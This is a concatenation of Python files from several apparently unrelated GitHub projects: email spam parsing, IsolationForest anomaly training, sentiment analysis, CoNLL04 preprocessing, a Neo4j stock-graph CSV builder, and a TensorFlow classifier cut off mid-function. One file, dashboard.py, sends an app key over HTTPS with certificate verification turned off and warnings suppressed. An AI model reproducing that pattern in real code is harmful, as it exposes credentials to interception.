seq = []
for c in email:
if c in char2index:
seq.append(char2index[c])
sequences.append(seq)
with open("data/dataset.pkl", 'wb') as f:
pickle.dump([sequences, labels, char2index], f)
process_dataset()
def process_email(filename):
with open(filename) as f:
email = parser.parse(f)
cleantext = ""
if email.is_multipart():
for part in email.get_payload():
soup = BeautifulSoup(part.as_string(maxheaderlen=1))
txt = soup.get_text()
txt = ' '.join(txt.split())
i = txt.find("Content-Transfer-Encoding")
txt = txt[i + len("Content-Transfer-Encoding"):].split(maxsplit=2)[2]
cleantext += txt
else:
soup = BeautifulSoup(email.get_payload())
txt = soup.get_text()
txt = ' '.join(txt.split())
i = txt.find("Content-Transfer-Encoding")
txt = txt[i + len("Content-Transfer-Encoding"):].split(maxsplit=2)[2]
cleantext += txt
print(cleantext)
# for filename in os.listdir("data/infy_spam_emails"):
# process_email(f"data/infy_spam_emails/{filename}")
```
#### File: jojotshitenge/spam-detection-using-deep-learning/email_utils.py
```python
import email.parser
import os
import stat
import sys
def ExtractSubPayload(filename):
''' Extract the subject and payload from the .eml file.
'''
    if not os.path.exists(filename):  # input file does not exist
        print("ERROR: input file does not exist:", filename)
        sys.exit(1)
fp = open(filename)
msg = email.message_from_file(fp)
payload = msg.get_payload()
if type(payload) == type(list()):
payload = payload[0] # only use the first part of payload
sub = msg.get('subject')
sub = str(sub)
if type(payload) != type(''):
payload = str(payload)
return sub + payload
def ExtractBodyFromDir(srcdir, dstdir):
'''Extract the body information from all .eml files in the srcdir and
save the file to the dstdir with the same name.'''
    if not os.path.exists(dstdir):  # dest path does not exist
os.makedirs(dstdir)
files = os.listdir(srcdir)
for file in files:
srcpath = os.path.join(srcdir, file)
dstpath = os.path.join(dstdir, file)
src_info = os.stat(srcpath)
if stat.S_ISDIR(src_info.st_mode): # for subfolders, recurse
ExtractBodyFromDir(srcpath, dstpath)
else: # copy the file
body = ExtractSubPayload(srcpath)
dstfile = open(dstpath, 'w')
dstfile.write(body)
dstfile.close()
###################################################################
# main function start here
# srcdir is the directory where the .eml are stored
print('Input source directory: ') # ask for source and dest dirs
srcdir = input()
if not os.path.exists(srcdir):
print('The source directory %s does not exist, exit...' % (srcdir))
sys.exit()
# dstdir is the directory where the content .eml are stored
print('Input destination directory: ') # ask for source and dest dirs
dstdir = input()
if not os.path.exists(dstdir):
print('The destination directory is newly created.')
os.makedirs(dstdir)
###################################################################
ExtractBodyFromDir(srcdir, dstdir)
``` |
{
"source": "jojowei-cooler/ad",
"score": 2
} |
#### File: ad/ad/ad_train.py
```python
import joblib
from ad_model.processing import PREPROCESS
from sklearn.metrics import f1_score
from sklearn.ensemble import IsolationForest
from database import DATABASE, DUMMY
import numpy as np
class modelling(object):
r""" The modelling class takes input as dataframe or array and train Isolation Forest model
Paramteres
.........
data: DataFrame or array
input dataset
cols: list
list of parameters in input dataset
Attributes
----------
actual:array
actual label for test data
X: DataFrame or array
transformed values of input data
"""
def __init__(self, data):
self.data = data
self.cols = data.columns
def read_test(self, db):
""" Read test dataset for model validation"""
db.read_data('valid')
test = db.data
self.actual = test['Anomaly']
X = test[self.cols]
sc = joblib.load('scale')
self.X = sc.transform(X)
def isoforest(self, outliers_fraction=0.05, random_state=42, push_model=False): # modify the outlier
""" Train isolation forest
Parameters
----------
        outliers_fraction: float between 0.01 and 0.5 (default=0.05)
            expected fraction of anomalous samples in the input data
        push_model: boolean (default=False)
            if True, also persist the fitted column list and model to disk; the F1 score on the validation set is returned in either case
random_state: int (default=42)
"""
iso = IsolationForest(contamination=outliers_fraction, random_state=random_state)
md = iso.fit(self.data.values, None) # add .values to avoid the warning message (jojowei modification)
if push_model:
joblib.dump(self.cols, 'params')
joblib.dump(md, 'model')
return test(self, md)
def train(thread=False):
"""
Main function to perform training on input data
"""
if thread:
db = DUMMY()
else:
db = DATABASE('UEData')
db.read_data('train')
ps = PREPROCESS(db.data)
ps.process()
df = ps.data
mod = modelling(df)
mod.read_test(db)
scores = []
for of in np.arange(0.01, 0.4, 0.01):
scores.append(mod.isoforest(outliers_fraction=of))
opt_f1 = scores.index(max(scores)) + 1
mod.isoforest(outliers_fraction=opt_f1*0.01, push_model=True)
print("Optimum value of contamination : {}".format(opt_f1*0.01))
print('Training Ends : ')
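# Minimal usage sketch (editorial; this entry point is an assumption, not part of the
# original xApp): run the offline trainer against the DUMMY data source when no backing
# database is reachable, e.g. during local development.
# if __name__ == "__main__":
#     train(thread=True)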
def test(self, model):
    pred = model.predict(self.X)
    # IsolationForest labels anomalies as -1 and inliers as 1; always map them to 1/0 before scoring
    pred = [1 if p == -1 else 0 for p in pred]
    return f1_score(self.actual, pred)
```
#### File: ad/ad/dashboard.py
```python
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import json
def upload_to_dashboard(ue_name, du_name, degradation, timestamp):
ThingName="jojo_datatable"
ServiceName="Upload"
Appkey="<KEY>"
    # App key issued by ThingWorx, used to authenticate requests to its REST services
pre_url = 'https://192.168.3.11:5033/Thingworx/Things/'
url=pre_url+ThingName+'/Services/'+ServiceName
payload={
"UE" : ue_name,
"DU": du_name,
"Degradation": degradation,
"Timestamp": timestamp
}
headers={
"appKey": Appkey,
"Content-Type": "application/json"
}
r= requests.put(url, data=json.dumps(payload), headers=headers, verify=False)
def delete_dashboard_element(ue_name):
ThingName="jojo_datatable"
ServiceName="Deletion"
Appkey="<KEY>"
    # App key issued by ThingWorx, used to authenticate requests to its REST services
pre_url = 'https://192.168.3.11:5033/Thingworx/Things/'
url=pre_url+ThingName+'/Services/'+ServiceName
payload={
"UE" : ue_name
}
headers={
"appKey": Appkey,
"Content-Type": "application/json"
}
r= requests.put(url, data=json.dumps(payload), headers=headers, verify=False)
``` |
{
"source": "jojowither/Google-Map-Review",
"score": 3
} |
#### File: Google-Map-Review/src/sentiment.py
```python
from cnsenti import Sentiment
from cnsenti import Emotion
from hanziconv import HanziConv
import pandas as pd
import math
from termcolor import colored
def sentiment_analyze(text):
if isinstance (text, float) and math.isnan(text):
text = ''
text = HanziConv.toSimplified(text)
senti = Sentiment()
sentiment_result = senti.sentiment_count(text)
emotion = Emotion()
emotion_result = emotion.emotion_count(text)
emotion_result['樂'] = emotion_result.pop('乐')
emotion_result['懼'] = emotion_result.pop('惧')
emotion_result['惡'] = emotion_result.pop('恶')
emotion_result['驚'] = emotion_result.pop('惊')
return sentiment_result, emotion_result
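# Illustrative call (editorial): the first return value is cnsenti's sentiment count dict
# (word and positive/negative counts) and the second is the emotion count dict whose keys,
# after the renaming above, are 樂/好/怒/哀/懼/惡/驚.
# sent, emo = sentiment_analyze('餐點好吃,服務也很親切')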
if __name__ == "__main__":
filepath = '../data/newest_gm_reviews.csv'
reviews = pd.read_csv(filepath)
texts = reviews['caption']
sentiment_results = []
emotion_results = []
for text in texts:
sentiment_result, emotion_result = sentiment_analyze(text)
sentiment_results.append(sentiment_result)
emotion_results.append(emotion_result)
reviews['sentiment'] = sentiment_results
reviews['emotion'] = emotion_results
new_file = '../data/newest_gm_reviews_with_sent.csv'
reviews.to_csv(new_file, index=False)
print(colored('Finish', 'cyan'))
``` |
{
"source": "jojowither/Joint_Entity_and_Relation_Extraction",
"score": 2
} |
#### File: jojowither/Joint_Entity_and_Relation_Extraction/process_conll04.py
```python
import torch
import torch.utils.data as Data
import numpy as np
import copy
import json
import pickle
import os
root = 'data/'
dataset = 'conll04'
dataset_root = os.path.join(root, dataset)
root_data = os.path.join(dataset_root, 'conll04.corp')
def readfile(data):
with open(data, "r", encoding="utf-8") as f:
content = f.read().splitlines()
return content
def split_sentence(data):
num=0
max_len=0
record_len = {}
isspace = False
source_sentences = []
entity_seqs = []
relation_seqs = []
sentence = ''
entity_seq = ''
relation_seq = ''
for row_data in data:
try:
num_sent = int(row_data[0])
except IndexError:
if isspace==False:
isspace=True
else:
num+=1
isspace = False
source_sentences.append(sentence)
entity_seqs.append(entity_seq)
relation_seqs.append(relation_seq)
sentence = ''
entity_seq = ''
relation_seq = ''
else:
if len(row_data.split('\t'))==9:
sentence = sentence + row_data.split('\t')[5] + ' '
entity_seq = entity_seq + row_data.split('\t')[1] + ' '
if int(row_data.split('\t')[2])+1 > max_len:
max_len = int(row_data.split('\t')[2])+1
elif len(row_data.split('\t'))==3 :
relation_seq = relation_seq + row_data + ' '
# clean the space in the tail
for i, (s, e, r) in enumerate(zip(source_sentences, entity_seqs, relation_seqs)):
source_sentences[i] = s[:-1]
entity_seqs[i] = e[:-1]
relation_seqs[i] = r[:-1]
return source_sentences, entity_seqs, relation_seqs, max_len
def record_total_len(seq, max_len=200):
record_len = {i:0 for i in range(1, max_len+1)}
for s in seq:
record_len[len(s.split(' '))] += 1
return record_len
def filter_non_relation(source_sentences, entity_seqs, relation_seqs):
reserve_idx = []
for i,r in enumerate(relation_seqs):
if r!='':
reserve_idx.append(i)
filter_sentences = []
filter_entitys = []
filter_relations = []
for i in reserve_idx:
filter_sentences.append(source_sentences[i])
filter_entitys.append(entity_seqs[i])
filter_relations.append(relation_seqs[i])
return filter_sentences, filter_entitys, filter_relations
def process_seqs(source_sentences, entity_seqs, relation_seqs):
for idx, (sent, e_seq, r_seq) in enumerate(zip(source_sentences, entity_seqs, relation_seqs)):
# split to list
sent_l = sent.split(' ')
e_seq_l = e_seq.split(' ')
r_seq_l = r_seq.split(' ')
w2span_dict = {}
for i, s in enumerate(sent_l):
if ',' in s:
sent_l[i] = s.replace(',','COMMA')
if '-LRB-' in s:
sent_l[i] = s.replace('-LRB-','(')
if '-RRB-' in s:
sent_l[i] = s.replace('-RRB-',')')
# remove '.' in the word, like 'a.m.' -> 'am'
if '.' in s and len(s)>1:
sent_l[i] = s.replace('.','')
for i, s in enumerate(sent_l):
if '/' in s and e_seq_l[i]!='O':
w2span_dict[i] = s.split('/')
# remove the dot end of the word, if only appear dot dont remove
try :
s[-1]=='.'
except IndexError:
pass
# Does not affect
# it is '', and the raw input is '..' or '...'
else:
if s[-1]=='.' and len(s)>1:
sent_l[i] = s[:-1]
keys = sorted(w2span_dict.keys(), reverse=True)
for k in keys:
entity = e_seq_l[k]
del sent_l[k]
del e_seq_l[k]
B_idx = k
word_len = len(w2span_dict[k])
for i, w in enumerate(w2span_dict[k]):
sent_l.insert(k, w)
if i+1==word_len:
e_seq_l.insert(k, 'L-'+entity)
else:
e_seq_l.insert(k, 'I-'+entity)
k+=1
e_seq_l[B_idx] = 'B-'+entity
for i, e in enumerate(e_seq_l):
if e!='O' and e[0]!='B' and e[0]!='I' and e[0]!='L':
e_seq_l[i] = 'U-'+e_seq_l[i]
if e=='Loc':
e_seq_l[i] = 'U-'+e_seq_l[i]
record_loc = {}
previous_idx = 0
count_itag = 0
# Record: Previous starting position: {now starting position, now ending position}
for now_idx, e in enumerate(e_seq_l):
if e[0]=='U' or e[0]=='B':
record_loc[now_idx-count_itag] = {'start':now_idx, 'end':now_idx}
previous_idx = now_idx-count_itag
elif e[0]=='I':
count_itag += 1
elif e[0]=='L':
count_itag += 1
record_loc[previous_idx]['end'] = now_idx
now_r = 0
r_list = [' ' for _ in range(len(sent_l))]
if r_seq_l==[''] :
relation_seqs[idx] = r_list
else:
for triple_r in r_seq_l:
_a = int(triple_r.split('\t')[0])
_b = int(triple_r.split('\t')[1])
rel = triple_r.split('\t')[2]
# triple in A
end_address = record_loc[_a]['end']
if r_list[end_address]==' ':
r_list[end_address] = [rel+'-'+str(now_r)+'-'+'A']
else:
r_list[end_address].append(rel+'-'+str(now_r)+'-'+'A')
# triple in B
end_address = record_loc[_b]['end']
if r_list[end_address]==' ':
r_list[end_address] = [rel+'-'+str(now_r)+'-'+'B']
else:
r_list[end_address].append(rel+'-'+str(now_r)+'-'+'B')
now_r += 1
# Remove the COMMA in the entity
for i, (s,e) in enumerate(zip(sent_l, e_seq_l)):
# if s=='COMMA' and e!='O':
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
if s=='' :
sent_l[i] = '.'
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
# if s=='--' :
# del sent_l[i]
# del e_seq_l[i]
# del r_list[i]
source_sentences[idx] = ' '.join(sent_l)
entity_seqs[idx] = ' '.join(e_seq_l)
relation_seqs[idx] = r_list
return source_sentences, entity_seqs, relation_seqs
# concatenate the sentence, entity and relation to the list
def concat_s_e_r(sents, ent_seqs, rel_seqs):
# record the sentence, entity and relation
all_combine_list = []
for idx, (sent, e_seq, r_seq) in enumerate(zip(sents, ent_seqs, rel_seqs)):
sent_l = sent.split(' ')
e_seq_l = e_seq.split(' ')
data_represent = ''
for s,e,r in zip(sent_l, e_seq_l, r_seq):
if type(r) is list:
r = ' '.join(r)
data_represent += s+' '+e+' '+r+'\n'
all_combine_list.append(data_represent)
return all_combine_list
data = readfile(root_data)
source_sentences, entity_seqs, relation_seqs, max_len = split_sentence(data)
#======filter non relation sequences======
source_sentences, entity_seqs, relation_seqs = filter_non_relation(source_sentences, entity_seqs, relation_seqs)
# ========================================
source_sentences, entity_seqs, relation_seqs = process_seqs(source_sentences, entity_seqs, relation_seqs)
record_len = record_total_len(source_sentences)
all_combine_data = concat_s_e_r(source_sentences, entity_seqs, relation_seqs)
print('The numbers of data', len(all_combine_data))
test_size = int(len(all_combine_data)*0.2)
dev_size = int((len(all_combine_data)-test_size)*0.1)
train_size = len(all_combine_data)-dev_size-test_size
train_dataset, dev_dataset, test_dataset = Data.random_split(all_combine_data, [train_size, dev_size, test_size])
print('train_dataset', len(train_dataset))
print('dev_dataset', len(dev_dataset))
print('test_dataset', len(test_dataset))
with open(os.path.join(dataset_root, 'training_set.txt'), "w") as f:
for item in train_dataset:
f.write("%s\n" % item)
with open(os.path.join(dataset_root, 'dev_set.txt'), "w") as f:
for item in dev_dataset:
f.write("%s\n" % item)
with open(os.path.join(dataset_root, 'test_set.txt'), "w") as f:
for item in test_dataset:
f.write("%s\n" % item)
``` |
{
"source": "jojowither/Question-Answer-Project",
"score": 3
} |
#### File: Question-Answer-Project/web/request_test.py
```python
import requests
import json
import yaml
from pprint import pprint
import time
with open('config.yaml', 'r') as stream:
config = yaml.load(stream, Loader=yaml.FullLoader)
def time_count_wrapper(func):
def time_count(*args, **kwargs):
ts = time.time()
response = func(*args, **kwargs)
te = time.time()
print(f'\n{"="*40}')
print (f"Time consume: {te-ts:.3f} s")
print(f'{"="*40}\n')
return response
return time_count
@time_count_wrapper
def resquest_post(url, data):
response = requests.post(url=f"{url}/predictions/qa_server", data=data)
return response
def main():
context = input('Type the text: ')
question_list = []
while True:
question = input('Type the question (type "exit" to close): ')
if question=='exit':
break
question_list.append(question)
t = time.localtime()
timestamp = time.strftime('%Y%m%d%H%M%S', t)
profile = {}
profile['context'] = context
if question_list==[]:
profile["questions"] = []
else:
profile["questions"] = []
for question in question_list:
profile["questions"].append({"content":question,
"ID":f"{str(9999)}-{question}"})
payload = json.dumps(profile)
response = resquest_post(url=config['BASE_URL'], data=payload)
data = response.json()
print()
print('The response:')
pprint(data)
print()
# print(json.dumps(data, indent=4, ensure_ascii=False))
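    # Example of the payload built above (editorial, illustrative values only):
    # {"context": "<pasted passage>",
    #  "questions": [{"content": "<a question>", "ID": "9999-<a question>"}]}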
if __name__ == "__main__":
main()
``` |
{
"source": "jojowither/Taiwan-Stock-Knowledge-Graph",
"score": 3
} |
#### File: Taiwan-Stock-Knowledge-Graph/src/build_import_csv.py
```python
import csv
import hashlib
import os
from pathlib import Path
import twstock
def get_md5(string):
"""
Get md5 according to the string
"""
byte_string = string.encode("utf-8")
md5 = hashlib.md5()
md5.update(byte_string)
result = md5.hexdigest()
return result
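# Editorial note: the digest is deterministic, so repeated runs of this script assign the
# same node ID to the same name, which keeps the generated Neo4j import files stable.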
def build_person(executive_prep, person_import):
"""
    Create a 'person' file in csv format that can be imported into Neo4j.
format -> person_id:ID,name,:LABEL
label -> Person
"""
print(f'Writing to {person_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(person_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['person_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
person_set = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
person_set.add(row[0])
for person in person_set:
# generate md5 according to 'name'
person_id = get_md5(person)
info = [person_id, person, 'Person']
file_import_csv.writerow(info)
print('- done.')
def build_stock(stock_prep, stock_import):
"""
    Create a 'stock' file in csv format that can be imported into Neo4j.
format -> company_id:ID,name,code,:LABEL
label -> Stock
"""
print(f'Writing to {stock_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(stock_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['stock_id:ID', 'name', 'code', 'market', ':LABEL']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
info = [row[0], row[2], row[0], row[4], 'Stock']
file_import_csv.writerow(info)
print('- done.')
def build_stock_type(stock_prep, stock_type_import):
"""
    Create a 'stock_type' file in csv format that can be imported into Neo4j.
format -> stocktype_id:ID,name,:LABEL
label -> StockType
"""
print(f'Writing to {stock_type_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(stock_type_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['stocktype_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
stock_types = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
stock_types.add(row[1])
for stock_type in stock_types:
stock_type_id = get_md5(stock_type)
info = [stock_type_id, stock_type, 'StockType']
file_import_csv.writerow(info)
print('- done.')
def build_industry(stock_prep, industry_import):
"""
Create an 'industry' file in csv format that can be imported into Neo4j.
format -> industry_id:ID,name,:LABEL
label -> Industry
"""
print(f'Writing to {industry_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep,\
open(industry_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['industry_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
industries = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
industry = row[3] if row[3] != '' else '無'
industries.add(industry)
for industry in industries:
industry_id = get_md5(industry)
info = [industry_id, industry, 'Industry']
file_import_csv.writerow(info)
print('- done.')
def build_concept(concept_prep, concept_import):
"""
    Create a 'concept' file in csv format that can be imported into Neo4j.
format -> concept_id:ID,name,:LABEL
label -> Concept
"""
print(f'Writing to {concept_import.name} file...')
with open(concept_prep, 'r', encoding='utf-8') as file_prep,\
open(concept_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['concept_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
concepts = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
concept = row[0]
concepts.add(concept)
for concept in concepts:
concept_id = get_md5(concept)
info = [concept_id, concept, 'Concept']
file_import_csv.writerow(info)
print('- done.')
def bulid_dealer(dealer_prep, dealer_import):
"""
    Create a 'dealer' file in csv format that can be imported into Neo4j.
format -> dealer_id:ID,name,:LABEL
label -> Dealer
"""
    print(f'Writing to {dealer_import.name} file...')
with open(dealer_prep, 'r', encoding='utf-8') as file_prep, \
open(dealer_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = ['dealer_id:ID', 'name', ':LABEL']
file_import_csv.writerow(headers)
dealers = set()
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
dealers.add(row[0])
for dealer in dealers:
# generate md5 according to 'name'
dealer_id = get_md5(dealer)
info = [dealer_id, dealer, 'Dealer']
file_import_csv.writerow(info)
print('- done.')
def build_person_stock(executive_prep, relation_import):
"""Create an 'person_stock' file in csv format that can be imported into Neo4j.
format -> :START_ID,job,stock_num,:END_ID,:TYPE
person stock
type -> employ_of
"""
print(f'Writing to {relation_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', 'jobs', 'stock_num:int', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = get_md5(row[0])
end_id = row[1] # code
relation = [start_id, row[2], row[3], end_id, 'employ_of']
file_import_csv.writerow(relation)
print('- done.')
# build stock and stock_type
def build_stock_st(stock_prep, relation_import):
"""Create an 'stock_st' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock stock_type
type -> type_of
"""
print(f'Writing to {relation_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[0] # code
end_id = get_md5(row[1])
relation = [start_id, end_id, 'type_of']
file_import_csv.writerow(relation)
print('- done.')
def build_stock_industry(stock_prep, relation_import):
"""Create an 'stock_industry' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock industry
type -> industry_of
"""
print(f'Writing to {relation_import.name} file...')
with open(stock_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[0] # code
industry = row[3] if row[3] != '' else '無'
end_id = get_md5(industry)
relation = [start_id, end_id, 'industry_of']
file_import_csv.writerow(relation)
print('- done.')
def build_stock_concept(concept_prep, relation_import):
"""Create an 'stock_concept' file in csv format that can be imported into Neo4j.
format -> :START_ID,:END_ID,:TYPE
stock concept
type -> concept_of
"""
print(f'Writing to {relation_import.name} file...')
with open(concept_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = row[1]
concept = row[0]
end_id = get_md5(concept)
            # Maybe twstock hasn't been updated with the new stock yet
if start_id not in twstock.codes:
continue
relation = [start_id, end_id, 'concept_of']
file_import_csv.writerow(relation)
print('- done.')
def build_dealer_stock(executive_prep, relation_import):
"""Create an 'dealer_stock' file in csv format that can be imported into Neo4j.
format -> :START_ID,amount,:END_ID,:TYPE
dealer stock
type -> buy_or_sell
"""
print(f'Writing to {relation_import.name} file...')
with open(executive_prep, 'r', encoding='utf-8') as file_prep, \
open(relation_import, 'w', encoding='utf-8') as file_import:
file_prep_csv = csv.reader(file_prep, delimiter=',')
file_import_csv = csv.writer(file_import, delimiter=',')
headers = [':START_ID', 'amount:int', ':END_ID', ':TYPE']
file_import_csv.writerow(headers)
for i, row in enumerate(file_prep_csv):
if i == 0:
continue
start_id = get_md5(row[0])
end_id = row[1] # code
relation = [start_id, row[2], end_id, 'buy_or_sell']
file_import_csv.writerow(relation)
print('- done.')
if __name__ == '__main__':
prep_path = '../data/'
import_path = '../data/import'
if not os.path.exists(import_path):
os.makedirs(import_path)
# Node
build_person(Path(prep_path)/'executive_prep.csv',
Path(import_path)/'person.csv')
build_stock(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock.csv')
build_stock_type(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_type.csv')
build_industry(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'industry.csv')
build_concept(Path(prep_path)/'concept_prep.csv',
Path(import_path)/'concept.csv')
bulid_dealer(Path(prep_path)/'dealer_prep.csv',
Path(import_path)/'dealer.csv')
# Relation
build_person_stock(Path(prep_path)/'executive_prep.csv',
Path(import_path)/'person_stock.csv')
build_stock_st(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_st.csv')
build_stock_industry(Path(prep_path)/'tw_stock_info_prep.csv',
Path(import_path)/'stock_industry.csv')
build_stock_concept(Path(prep_path)/'concept_prep.csv',
Path(import_path)/'stock_concept.csv')
build_dealer_stock(Path(prep_path)/'dealer_prep.csv',
Path(import_path)/'dealer_stock.csv')
``` |
{
"source": "Jojoxiao/Machine-Learning-for-Beginner-by-Python3",
"score": 3
} |
#### File: BPNN/BPNN_Classify/TensorFlow_BPNN_Classify.py
```python
import tensorflow as tf
import BPNN_Classify_Data as bpd
import matplotlib.pyplot as plt
import numpy as np
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# 设置正确率的刻度与子刻度
y_toge = MultipleLocator(0.02) # 将y轴主刻度标签设置为0.1的倍数
y_son = MultipleLocator(0.01) # 将此y轴次刻度标签设置为0.01的倍数
# 分类数
countclass = 2
'''Part 2: helper functions'''
# 根据输出的结果判断类别的函数
def judge(ydata):
maxnum = np.max(ydata, axis=1)
lastdata = []
for ii in range(len(ydata)):
maxindex = list(ydata[ii]).index(maxnum[ii])
fu = [0] * len(ydata[0])
fu[maxindex] = 1
lastdata.append(fu)
return np.array(lastdata)
# 根据输出的结果以及真实结果输出分类的效果
def outvsreal(outdata, realdata):
subdata = outdata - realdata
sundata = np.sum(np.abs(subdata), axis=1)
correct = list(sundata).count(0)
return correct / len(outdata)
'''Part 3: build the training function with TensorFlow'''
# 创建激活函数
def activate(input_layer, weights, biases, actfunc):
layer = tf.add(tf.matmul(input_layer, weights), biases)
if actfunc == 'relu':
return tf.nn.relu(layer)
elif actfunc == 'tanh':
return tf.nn.tanh(layer)
elif actfunc == 'sigmoid':
return tf.nn.sigmoid(layer)
elif actfunc == 'linear':
return layer
# 权重初始化的方式和利用激活函数的关系很大
# sigmoid: xavir tanh: xavir relu: he
# 构建训练函数
def Ten_train(xdata, ydata, addxdata, addydata, kcount, hiddenlayers=3, hiddennodes=100, \
learn_rate=0.02, itertimes=20, batch_size=200, activate_func='tanh'):
# 开始搭建神经网络
Input_Dimen = len(xdata[0])
Unit_Layers = [Input_Dimen] + [hiddennodes] * hiddenlayers + [len(ydata[0])] # 输入的维数,隐层的神经数,输出的维数1
# 创建占位符
x_data = tf.placeholder(shape=[None, Input_Dimen], dtype=tf.float32, name='x_data')
y_target = tf.placeholder(shape=[None, len(ydata[0])], dtype=tf.float32)
# 实现动态命名变量
VAR_NAME = locals()
for jj in range(hiddenlayers + 1):
VAR_NAME['weight%s' % jj] = tf.Variable(np.random.rand(Unit_Layers[jj], Unit_Layers[jj + 1]) / np.sqrt(Unit_Layers[jj]), \
dtype=tf.float32, name='Weight%s' % jj) # sigmoid tanh
            # He initialization (for relu):
            # VAR_NAME['weight%s' % jj] = tf.Variable(np.random.rand(Unit_Layers[jj], Unit_Layers[jj + 1]) / np.sqrt(Unit_Layers[jj] / 2), dtype=tf.float32, name='weight%s' % jj)
VAR_NAME['bias%s' % jj] = tf.Variable(tf.random_normal([Unit_Layers[jj + 1]], stddev=10), dtype=tf.float32, name='Bias%s' % jj)
if jj == 0:
VAR_NAME['ooutda%s' % jj] = activate(x_data, eval('weight%s' % jj), eval('bias%s' % jj),
actfunc=activate_func)
elif jj == hiddenlayers:
VAR_NAME['ooutda%s' % jj] = activate(eval('ooutda%s' % (jj - 1)), eval('weight%s' % jj),\
eval('bias%s' % jj), actfunc='linear') # 因此最后一层采用线性激活函数
else:
VAR_NAME['ooutda%s' % jj] = activate(eval('ooutda%s' % (jj - 1)), eval('weight%s' % jj),\
eval('bias%s' % jj), actfunc=activate_func)
# 需要对输出进行softmax计算
uuu = tf.nn.softmax(eval('ooutda%s' % (hiddenlayers)))
# 交叉熵函数
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_target, logits=eval('ooutda%s' % (hiddenlayers))))
# 计算精确度需要
accu = eval('ooutda%s' % hiddenlayers)
# 优化的方法
# my_opt = tf.train.GradientDescentOptimizer(learn_rate)
my_opt = tf.train.AdamOptimizer(learn_rate)
train_step = my_opt.minimize(loss)
# 初始化
init = tf.global_variables_initializer()
loss_vec = [] # 训练误差
loss_vec_add = [] # 验证误差
acc_vec = [] # 训练精确度
acc_vec_add = [] # 验证精确度
# 需要保存的权重以及偏置
graph = tf.get_default_graph()
saver = tf.train.Saver(max_to_keep=1)
sess = tf.Session()
# 存储精确率的字典
accudict = {}
accunum = 0
sess.run(init)
for i in range(itertimes): # 在总共的迭代次数中选择最高的(验证正确率+训练精确率)
for jj in range(int(len(xdata) / batch_size)):
rand_index = np.random.choice(len(xdata), size=batch_size, replace=False)
rand_x = xdata[rand_index]
rand_y = ydata[rand_index]
# 开始训练
sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})
# 训练误差
temp_loss = sess.run(loss, feed_dict={x_data: xdata, y_target: ydata})
# 存储训练误差
loss_vec.append(temp_loss)
# 验证误差
temp_loss_add = sess.run(loss, feed_dict={x_data: addxdata, y_target: addydata})
# 存储验证误差
loss_vec_add.append(temp_loss_add)
# 训练精确率
